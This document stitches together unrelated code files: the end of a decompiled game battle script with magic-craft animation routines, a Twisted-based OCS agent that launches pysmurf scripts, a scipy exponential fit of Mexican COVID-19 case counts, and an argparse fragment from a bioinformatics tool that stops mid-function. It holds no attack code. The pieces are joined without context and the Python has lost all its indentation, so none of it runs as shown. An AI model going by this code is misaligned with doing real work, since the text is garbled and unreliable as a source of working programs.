label("loc_505A")
ForeachTarget("loc_506B")
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_505A")
label("loc_506B")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 时间减速 end
def Craft_时间驱动(): pass
label("时间驱动")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg105_00.eff")
LoadEffect(0x1, "battle\\mg105_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(3400)
Yield()
label("loc_50DA")
ForeachTarget("loc_5103")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_50DA")
label("loc_5103")
Sleep(400)
Yield()
ResetTarget()
label("loc_5108")
ForeachTarget("loc_5115")
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_5108")
label("loc_5115")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 时间驱动 end
def Craft_灾厄之爪(): pass
label("灾厄之爪")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg106_00.eff")
LoadEffect(0x1, "battle\\mg106_01.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xF2, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xF2, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(800)
Yield()
AS_3D(100, 100, 100, 5000)
Sleep(1600)
Yield()
ResetTarget()
label("loc_5196")
ForeachTarget("loc_51BF")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_5196")
label("loc_51BF")
Sleep(800)
Yield()
AS_3D(250, 250, 250, 200)
Sleep(900)
Yield()
BeginChrThread(0xFF, 3, "loc_2", 0x0)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
Return()
# 灾厄之爪 end
def Craft_6B_107_51E1(): pass
label("Craft_6B_107_51E1")
Return()
# Craft_6B_107_51E1 end
def Craft_6C_108_51E2(): pass
label("Craft_6C_108_51E2")
Return()
# Craft_6C_108_51E2 end
def Craft_6D_109_51E3(): pass
label("Craft_6D_109_51E3")
Return()
# Craft_6D_109_51E3 end
def Craft_6E_110_51E4(): pass
label("Craft_6E_110_51E4")
Return()
# Craft_6E_110_51E4 end
def Craft_6F_111_51E5(): pass
label("Craft_6F_111_51E5")
Return()
# Craft_6F_111_51E5 end
def Craft_魔导祝福(): pass
label("魔导祝福")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg112_00.eff")
LoadEffect(0x1, "battle\\mg112_01.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFB, 0, 600, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(1000)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 20)
ResetTarget()
label("loc_525C")
ForeachTarget("loc_5289")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(228, 0x0)
Sleep(200)
Yield()
NextTarget()
Jump("loc_525C")
label("loc_5289")
Sleep(1000)
Yield()
BeginChrThread(0xFF, 3, "loc_15", 0x0)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
Return()
# 魔导祝福 end
def Craft_A反射屏障(): pass
label("A-反射屏障")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg113_00.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFE, 0, 0, 0, 500)
Sleep(400)
Yield()
BeginChrThread(0xFF, 3, "loc_5328", 0x0)
PlayEffect(0xFF, 0xFE, 0x0, 0x8, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(500)
Yield()
Sleep(1200)
Yield()
BlurSwitch(0x64, 0xBBFFFFFF, 0x0, 0x0, 0x1)
Sleep(300)
Yield()
AS_3D(180, 180, 180, 100)
CancelBlur(100)
Sleep(200)
Yield()
DamageCue(0xFE)
WaitChrThread(0xFF, 3)
WaitEffect(0xFF, 0x4)
FreeEffect(0x0)
Return()
label("loc_5328")
SoundEx(173, 0x0)
SoundEx(182, 0x0)
Sleep(2000)
Yield()
SoundEx(190, 0x0)
Return()
# A-反射屏障 end
def Craft_圣灵苏生(): pass
label("圣灵苏生")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg114_00.eff")
LoadEffect(0x1, "battle\\mg114_01.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFB, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
AS_3D(100, 100, 100, 300)
Sleep(1500)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 22)
ResetTarget()
label("loc_53B8")
ForeachTarget("loc_53E1")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(800)
Yield()
NextTarget()
Jump("loc_53B8")
label("loc_53E1")
Sleep(2000)
Yield()
ResetTarget()
label("loc_53E6")
ForeachTarget("loc_53F7")
SoundEx(8, 0x0)
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_53E6")
label("loc_53F7")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
Return()
# 圣灵苏生 end
def Craft_纯净弧光(): pass
label("纯净弧光")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg115_00.eff")
LoadEffect(0x1, "battle\\mg115_01.eff")
AS_78(0)
SetBrightness(0x0, 0x0, 1000)
Sleep(250)
Yield()
Fade(0x1, 500, 0x0)
Sleep(200)
Yield()
LockCamera(0xFB, 0, 13000, 0, 0)
AS_B0(0xFFDD, 0x0)
Sleep(800)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1000)
Yield()
Fade(0x1, 750, 0x0)
ResetBrightness(500)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
SetCameraDistance(27000, 0)
AS_B0(0x28, 0x5DC)
Sleep(1400)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x1, 0x3)
AS_3D(200, 200, 200, 1500)
Sleep(2500)
Yield()
CancelBlur(500)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 18, 20)
SoundEx(186, 0x0)
ResetTarget()
label("loc_54DD")
ForeachTarget("loc_5506")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_54DD")
label("loc_5506")
Sleep(100)
Yield()
BeginChrThread(0xFF, 3, "loc_15", 0x0)
SetBrightness(0x0, 0x1, 0)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
Return()
# 纯净弧光 end
def Craft_74_116_5520(): pass
label("Craft_74_116_5520")
Return()
# Craft_74_116_5520 end
def Craft_75_117_5521(): pass
label("Craft_75_117_5521")
Return()
# Craft_75_117_5521 end
def Craft_76_118_5522(): pass
label("Craft_76_118_5522")
Return()
# Craft_76_118_5522 end
def Craft_77_119_5523(): pass
label("Craft_77_119_5523")
Return()
# Craft_77_119_5523 end
def Craft_神圣祝福(): pass
label("神圣祝福")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg120_00.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(1000)
Yield()
DamageCue(0xFE)
WaitEffect(0xFF, 0x4)
FreeEffect(0x0)
Return()
# 神圣祝福 end
def Craft_虚空幻域(): pass
label("虚空幻域")
AS_78(1)
LoadEffect(0x0, "battle\\mg121_00.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xF4, 0, 0, 0, 600)
Sleep(600)
Yield()
SoundEx(238, 0x0)
ResetTarget()
label("虚空幻域_loop")
ForeachTarget("虚空幻域_loop_end")
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
DamageCue(0xFE)
Yield()
NextTarget()
Jump("虚空幻域_loop")
label("虚空幻域_loop_end")
ResetTarget()
WaitEffect(0xFE, 0x4)
FreeEffect(0x0)
Return()
# 虚空幻域 end
def Craft_狂乱之月(): pass
label("狂乱之月")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg122_00.eff")
LoadEffect(0x1, "battle\\mg122_01.eff")
AS_78(0)
SetBrightness(0x0, 0x0, 1000)
Sleep(350)
Yield()
Fade(0x1, 800, 0x0)
LockCamera(0xFB, 0, 30000, 0, 0)
SetCameraDegree(0, 0, 0, 0)
SetCameraDistance(14000, 0)
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 30000, 0, 0, 0, 0, 1000, 1000, 1000, 4)
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x5)
Sleep(2800)
Yield()
AS_3D(50, 50, 50, 2500)
SetCameraDistance(17000, 2700)
Sleep(2300)
Yield()
AS_43(0x0, 0x320, 0x0)
Sleep(800)
Yield()
Fade(0x1, 300, 0x0)
CancelBlur(500)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
ResetBrightness(300)
Sleep(300)
Yield()
ResetTarget()
label("loc_56B5")
ForeachTarget("loc_56E0")
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
DamageCue(0xFE)
Sleep(100)
Yield()
NextTarget()
Jump("loc_56B5")
label("loc_56E0")
Sleep(500)
Yield()
WaitEffect(0xFF, 0x4)
AS_14(0x1)
Call("loc_1D5")
SetBrightness(0x0, 0x1, 0)
Return()
# 狂乱之月 end
def Craft_星之守护(): pass
label("星之守护")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg116_00.eff")
LoadEffect(0x1, "battle\\mg116_01.eff")
AS_78(0)
SetBrightness(0x0, 0x0, 1000)
ResetTarget()
Sleep(400)
Yield()
Fade(0x1, 800, 0x0)
LockCamera(0xFB, 0, 9000, 0, 0)
SetCameraDegree(40, 10, 0, 0)
SetCameraDistance(20000, 0)
AS_60(0xF7)
AS_6D(0x40000)
Sleep(600)
Yield()
SetCameraDegree(0, -30, 0, 2850)
SetCameraDistance(17000, 3000)
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
SoundEx(359, 0x1)
Sleep(2050)
Yield()
SetCameraDistance(29000, 1000)
SoundEx(312, 0x0)
Sleep(850)
Yield()
AS_5F(0xF7, 0x1)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 500, 0, 0)
SetCameraDegree(70, 15, 0, 0)
SetCameraDistance(24000, 0)
SoundEx(186, 0x0)
LockCamera(0xFB, 0, 0, 0, 1200)
AS_B0(0x14, 0x4B0)
AS_0B(0x2D, 0xBB8)
Sleep(600)
Yield()
StopSound(359)
ResetTarget()
label("loc_57F2")
ForeachTarget("loc_581B")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(300)
Yield()
NextTarget()
Jump("loc_57F2")
label("loc_581B")
Sleep(1000)
Yield()
ResetBrightness(500)
BeginChrThread(0xFF, 3, "loc_15", 0x0)
AS_14(0x0)
WaitEffect(0xFF, 0x4)
AS_14(0x1)
Call("loc_1D5")
SetBrightness(0x0, 0x1, 0)
Return()
# 星之守护 end
def Craft_情报解析(): pass
label("情报解析")
ResetTarget()
AS_78(1)
LoadEffect(0x1, "battle/mg124_00.eff")
AS_78(0)
ResetLookingTargetData()
LockCamera(0xF8, 0, 0, 0, 1500)
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1500)
Yield()
DamageCue(0xFE)
AS_14(0x1)
Call("loc_1D5")
AS_8D(0x4A, 0x0, 0x0, 0x0, 0x0)
Return()
# 情报解析 end
def Craft_7D_125_58A0(): pass
label("Craft_7D_125_58A0")
Return()
# Craft_7D_125_58A0 end
def Craft_7E_126_58A1(): pass
label("Craft_7E_126_58A1")
Return()
# Craft_7E_126_58A1 end
def Craft_7F_127_58A2(): pass
label("Craft_7F_127_58A2")
Return()
# Craft_7F_127_58A2 end
def Craft_回复术(): pass
label("回复术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg128_00.eff")
AS_78(0)
Sleep(125)
Yield()
LockCamera(0xF8, 0, 0, 0, 600)
Sleep(600)
Yield()
SoundEx(226, 0x0)
PlayEffect(0xFF, 0xF8, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(2000)
Yield()
SoundEx(8, 0x0)
DamageCue(0xFE)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 回复术 end
def Craft_中回复术(): pass
label("中回复术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg129_00.eff")
AS_78(0)
Sleep(125)
Yield()
LockCamera(0xF8, 0, 0, 0, 600)
Sleep(700)
Yield()
BeginChrThread(0xFF, 3, "loc_5970", 0x0)
PlayEffect(0xFF, 0xF8, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(2250)
Yield()
SoundEx(8, 0x0)
DamageCue(0xFE)
WaitChrThread(0xFF, 3)
AS_14(0x0)
FreeEffect(0x0)
Return()
label("loc_5970")
SoundEx(226, 0x0)
Sleep(150)
Yield()
SoundEx(221, 0x0)
Return()
# 中回复术 end
def Craft_大回复术(): pass
label("大回复术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg130_00.eff")
LoadEffect(0x1, "battle\\mg130_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
BeginChrThread(0xFF, 3, "loc_5A1D", 0x0)
PlayEffect(0xFF, 0xF8, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1120)
Yield()
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(500)
Yield()
SoundEx(8, 0x0)
DamageCue(0xFE)
WaitChrThread(0xFF, 3)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
label("loc_5A1D")
SoundEx(227, 0x0)
Sleep(400)
Yield()
SoundEx(226, 0x0)
Sleep(700)
Yield()
SoundEx(228, 0x0)
Return()
# 大回复术 end
def Craft_水之幻影(): pass
label("水之幻影")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg131_00.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
label("loc_5A61")
ForeachTarget("loc_5A8A")
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
NextTarget()
Jump("loc_5A61")
label("loc_5A8A")
Sleep(1500)
Yield()
ResetTarget()
label("loc_5A8F")
ForeachTarget("loc_5A9C")
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_5A8F")
label("loc_5A9C")
AS_14(0x0)
FreeEffect(0x0)
Return()
# 水之幻影 end
def Craft_封魔领域(): pass
label("封魔领域")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg132_00.eff")
LoadEffect(0x1, "battle\\mg132_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1100)
Yield()
label("loc_5B08")
ForeachTarget("loc_5B2D")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
NextTarget()
Jump("loc_5B08")
label("loc_5B2D")
Sleep(1900)
Yield()
ResetTarget()
label("loc_5B32")
ForeachTarget("loc_5B43")
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_5B32")
label("loc_5B43")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 封魔领域 end
def Craft_中复苏术(): pass
label("中复苏术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg133_00.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xF8, 0, 0, 0, 600)
Sleep(600)
Yield()
BeginChrThread(0xFF, 3, "loc_5BB5", 0x0)
PlayEffect(0xFF, 0xF8, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(3000)
Yield()
SoundEx(8, 0x0)
DamageCue(0xFE)
WaitChrThread(0xFF, 3)
WaitEffect(0xFF, 0x4)
FreeEffect(0x0)
Return()
label("loc_5BB5")
SoundEx(549, 0x0)
SoundEx(227, 0x0)
Sleep(2100)
Yield()
SoundEx(230, 0x0)
Return()
# 中复苏术 end
def Craft_复苏术(): pass
label("复苏术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg134_00.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xF8, 0, 0, 0, 600)
Sleep(600)
Yield()
BeginChrThread(0xFF, 3, "loc_5C2D", 0x0)
PlayEffect(0xFF, 0xF8, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(3000)
Yield()
SoundEx(8, 0x0)
DamageCue(0xFE)
WaitEffect(0xFF, 0x4)
FreeEffect(0x0)
Return()
label("loc_5C2D")
SoundEx(183, 0x0)
SoundEx(186, 0x0)
Sleep(1800)
Yield()
SoundEx(230, 0x0)
Return()
# 复苏术 end
def Craft_全回复术(): pass
label("全回复术")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg135_00.eff")
AS_78(0)
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
BeginChrThread(0xFF, 3, "loc_5CA3", 0x0)
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 10, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1620)
Yield()
SoundEx(8, 0x0)
DamageCue(0xFE)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
label("loc_5CA3")
SoundEx(183, 0x0)
Sleep(100)
Yield()
SoundEx(226, 0x0)
Sleep(1050)
Yield()
SoundEx(178, 0x0)
Sleep(150)
Yield()
SoundEx(228, 0x0)
Return()
# 全回复术 end
def Craft_88_136_5CC0(): pass
label("Craft_88_136_5CC0")
# Craft_88_136_5CC0 end
SaveToFile()
Try(main)
|
from twisted.internet import reactor, protocol, threads
from twisted.python.failure import Failure
from twisted.internet.error import ProcessDone, ProcessTerminated
from twisted.internet.defer import inlineCallbacks, Deferred
from autobahn.twisted.util import sleep as dsleep
from twisted.logger import Logger, FileLogObserver
import sys
from typing import Optional
import time
import os
import argparse
on_rtd = os.environ.get('READTHEDOCS') == 'True'
if not on_rtd:
from ocs import ocs_agent, site_config, ocs_twisted
from ocs.ocs_agent import log_formatter
from ocs.ocs_twisted import TimeoutLock
class PysmurfScriptProtocol(protocol.ProcessProtocol):
"""
The process protocol used to dispatch external Pysmurf scripts, and manage
the stdin, stdout, and stderr pipelines.
Arguments
---------
path : str
Path of script to run.
log : txaio.tx.Logger
txaio logger object, used to log stdout and stderr messages.
Attributes
-----------
path : str
Path of script to run.
log : txaio.tx.Logger
txaio logger object, used to log stdout and stderr messages.
end_status : twisted.python.failure.Failure
Reason that the process ended.
"""
def __init__(self, path, log=None):
self.path = path
self.log = log
self.end_status: Optional[Failure] = None
def connectionMade(self):
"""Called when process is started"""
self.transport.closeStdin()
def outReceived(self, data):
"""Called whenever data is received through stdout"""
if self.log:
self.log.info("{path}: {data}",
path=self.path.split('/')[-1],
data=data.strip().decode('utf-8'))
def errReceived(self, data):
"""Called whenever data is received through stderr"""
self.log.error(data)
def processExited(self, status: Failure):
"""Called when process has exited."""
rc = status.value.exitCode
if self.log is not None:
self.log.info("Process ended with exit code {rc}", rc=rc)
self.deferred.callback(rc)
class PysmurfController:
"""
Controller object for running pysmurf scripts and functions.
Args:
agent (ocs.ocs_agent.OCSAgent):
OCSAgent object which is running
args (Namespace):
argparse namespace with site_config and agent specific arguments
Attributes:
agent (ocs.ocs_agent.OCSAgent):
OCSAgent object which is running
log (txaio.tx.Logger):
txaio logger object created by agent
prot (PysmurfScriptProtocol):
protocol used to call and monitor external pysmurf scripts
protocol_lock (ocs.ocs_twisted.TimeoutLock):
lock to protect multiple pysmurf scripts from running simultaneously.
"""
def __init__(self, agent, args):
self.agent: ocs_agent.OCSAgent = agent
self.log = agent.log
self.prot = None
self.protocol_lock = TimeoutLock()
self.current_session = None
if args.monitor_id is not None:
self.agent.subscribe_on_start(
self._on_session_data,
'observatory.{}.feeds.pysmurf_session_data'.format(args.monitor_id),
)
def _on_session_data(self, _data):
data, feed = _data
if self.current_session is not None:
if data['id'] == os.environ.get("SMURFPUB_ID"):
if data['type'] == 'session_data':
if isinstance(data['payload'], dict):
self.current_session.data.update(data['payload'])
else:
self.log.warn("Session data not passed as a dict!! Skipping...")
elif data['type'] == 'session_log':
if isinstance(data['payload'], str):
self.current_session.add_message(data['payload'])
@inlineCallbacks
def _run_script(self, script, args, log, session):
"""
Runs a pysmurf control script. Can only run from the reactor.
Args:
script (string):
path to the script you wish to run
args (list, optional):
List of command line arguments to pass to the script.
Defaults to [].
log (string or bool, optional):
Determines if and how the process's stdout should be logged.
You can pass the path to a logfile, True to use the agent's log,
or False to not log at all.
"""
with self.protocol_lock.acquire_timeout(0, job=script) as acquired:
if not acquired:
return False, "The requested script cannot be run because " \
"script {} is already running".format(self.protocol_lock.job)
self.current_session = session
try:
# IO is not really safe from the reactor thread, so we possibly
# need to find another way to do this if people use it and it
# causes problems...
logger = None
if isinstance(log, str):
self.log.info("Logging output to file {}".format(log))
log_file = yield threads.deferToThread(open, log, 'a')
logger = Logger(observer=FileLogObserver(log_file, log_formatter))
elif log:
# If log==True, use agent's logger
logger = self.log
self.prot = PysmurfScriptProtocol(script, log=logger)
self.prot.deferred = Deferred()
python_exec = sys.executable
cmd = [python_exec, '-u', script] + list(map(str, args))
self.log.info("{exec}, {cmd}", exec=python_exec, cmd=cmd)
reactor.spawnProcess(self.prot, python_exec, cmd, env=os.environ)
rc = yield self.prot.deferred
return (rc == 0), "Script has finished with exit code {}".format(rc)
finally:
# Sleep to allow any remaining messages to be put into the
# session var
yield dsleep(1.0)
self.current_session = None
@inlineCallbacks
def run(self, session, params=None):
"""run(script, args=[], log=True)
**Task** - Runs a pysmurf control script.
Parameters:
script (string):
Path of the pysmurf script to run.
args (list, optional):
List of command line arguments to pass to the script. Defaults
to [].
log (string/bool, optional):
Determines if and how the process's stdout should be logged.
You can pass the path to a logfile, True to use the agent's
log, or False to not log at all.
Notes:
Data and logs may be passed from the pysmurf control script to the
session object by publishing it via the Pysmurf Publisher using the
message types ``session_data`` and ``session_logs`` respectively.
For example, below is a simple script which starts the data stream
and returns the datfile path and the list of active channels to the
session::
active_channels = S.which_on(0)
datafile = S.stream_data_on()
S.pub.publish({
'datafile': datafile, 'active_channels': active_channels
}, msgtype='session_data')
This would result in the following session.data object::
>>> {
'datafile': '/data/smurf_data/20200316/1584401673/outputs/1584402020.dat',
'active_channels': [0,1,2,3,4]
}
"""
ok, msg = yield self._run_script(
params['script'],
params.get('args', []),
params.get('log', True),
session
)
return ok, msg
def abort(self, session, params=None):
"""abort()
**Task** - Aborts the actively running script.
"""
self.prot.transport.signalProcess('KILL')
return True, "Aborting process"
@inlineCallbacks
def tune_squids(self, session, params=None):
"""tune_squids(args=[], log=True)
**Task** - Runs the fake script /config/scripts/pysmurf/tune_squids.py
Args:
args (list, optional):
List of command line arguments to pass to the script.
Defaults to [].
log (string/bool, optional):
Determines if and how the process's stdout should be logged.
You can pass the path to a logfile, True to use the agent's log,
or False to not log at all.
"""
if params is None:
params = {}
ok, msg = yield self._run_script(
'/config/scripts/pysmurf/tune_squids.py',
params.get('args', []),
params.get('log', True),
session
)
return ok, msg
def make_parser(parser=None):
"""
Builds argsparse parser, allowing sphinx to auto-document it.
"""
if parser is None:
parser = argparse.ArgumentParser()
pgroup = parser.add_argument_group('Agent Options')
pgroup.add_argument('--monitor-id', '-m', type=str,
help="Instance id for pysmurf-monitor corresponding to "
"this pysmurf instance.")
return parser
if __name__ == '__main__':
parser = make_parser()
args = site_config.parse_args(agent_class='PysmurfController', parser=parser)
agent, runner = ocs_agent.init_site_agent(args)
controller = PysmurfController(agent, args)
agent.register_task('run', controller.run, blocking=False)
agent.register_task('abort', controller.abort, blocking=False)
agent.register_task('tune_squids', controller.tune_squids, blocking=False)
runner.run(agent, auto_reconnect=True)
|
###-----------###
### Importing ###
###-----------###
import pandas as pd
import numpy as np
import datetime
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
###------------------###
### Helper Functions ###
###------------------###
## Time series management
def national_timeseries(df, log=False):
'''
Returns a dataframe with the national number of COVID cases for Mexico where each row is indexed by a date (t0 = 2020-02-28).
If log=True, return the log of the cases.
'''
if log:
return np.log10( df.set_index('Fecha').loc[:,['México']] )
else:
return df.set_index('Fecha').loc[:,['México']]
###-------###
### Model ###
###-------###
def exponential_model(t, y0, β): return y0 * np.exp(β*t)
if __name__ == "__main__":
# Reading data
DATA_URL_MEX = 'https://raw.githubusercontent.com/mexicovid19/Mexico-datos/master/datos/series_de_tiempo/'
mex_confirmed = pd.read_csv(DATA_URL_MEX+'covid19_mex_casos_totales.csv', )
# paths for saving
PLOT_PATH = '../media/'
CSV_PATH = '../results/'
save_ = True
# Fit time window
n_days = 7
total_cases_timeseries = national_timeseries(mex_confirmed).iloc[-n_days:,0]
# Data preparation
xdata = np.array( range(len(total_cases_timeseries)) )
ydata = total_cases_timeseries.values
# Initial parameter guess
p0 = [ydata[-1], 0.1]
# Model parameter fit. Returns parameters and their covariance matrix
popt, pcov = curve_fit(exponential_model, xdata, ydata, p0)
# Projection days
forecast_horizon = 2 # days
# Growth rate std
σ = np.sqrt( pcov[1,1] )
# Fitting and projecting
xfit = range( len(xdata) + forecast_horizon )
yfit = exponential_model(xfit, *popt)
yfit_min = exponential_model(xfit[-(forecast_horizon+1):], popt[0], popt[1] - 2*σ, )
yfit_max = exponential_model(xfit[-(forecast_horizon+1):], popt[0], popt[1] + 2*σ, )
# helper temporal values
trange = total_cases_timeseries.index.values
t0 = datetime.datetime.strptime( trange[0], '%Y-%m-%d')
tfit = [(t0 + datetime.timedelta(days=t)).strftime('%Y-%m-%d') for t in xfit ]
# Dataframe with fits and data
Data = national_timeseries(mex_confirmed)
Data['México'] = Data['México'].astype(int)
CSV = Data.join(pd.Series( np.round(yfit), tfit, name='Fit'), how='outer' )
CSV = CSV.join(pd.Series( np.round(yfit_min), tfit[-(forecast_horizon+1):], name='Fit_min'), how='outer' )
CSV = CSV.join(pd.Series( np.round(yfit_max), tfit[-(forecast_horizon+1):], name='Fit_max'), how='outer' )
CSV.index.rename('Fecha', inplace=True)
print(CSV)
# Plotting
plt.figure( figsize=(10,8) )
# plot data
plt.plot(trange, ydata, lw=0, marker='o', ms=8)
# plot fit
plt.plot(tfit, yfit, c='orange', label='tasa esperada: {} % diario'.format( np.round(popt[1]*100 ,1)) )
# error cones
plt.fill_between(tfit[-(forecast_horizon+1):], yfit_min, yfit_max,
alpha=0.2, color='orange');
plt.title( 'Casos totales de COVID-19 en {}'.format( 'México' ) , size=16)
plt.ylabel('Número de casos', size=15);
plt.legend(loc='upper left')
plt.xticks(rotation=45)
# plt.yscale('log')
plt.tight_layout()
if save_:
plt.savefig( PLOT_PATH+'covid19_mex_fit.png' )
CSV.to_csv( CSV_PATH+'covid19_mex_fit.csv' )
plt.show()
else:
print(CSV)
plt.show()
|
from Bio import SeqIO
from argparse import (ArgumentParser, FileType)
import os, sys, re, collections, operator, math, time,base64
import pandas as pd
import hashlib, copy
from subprocess import Popen, PIPE
from Bio import GenBank
from parsityper.helpers import read_fasta
from parsityper.version import __version__
def parse_args():
"Parse the input arguments, use '-h' for help"
parser = ArgumentParser(description='Analyse MSA')
parser.add_argument('--input_msa', type=str, required=True, help='Aligned fasta file')
parser.add_argument('--input_meta', type=str, required=True,
help='tab delimited sample genotype information')
parser.add_argument('--ref_id', type=str, required=True,
help='sample_id for reference sequence to use in MSA')
parser.add_argument('--ref_gbk', type=str, required=True,
help='GenBank file for reference sequences')
parser.add_argument('--outdir', type=str, required=True,
help='output directory')
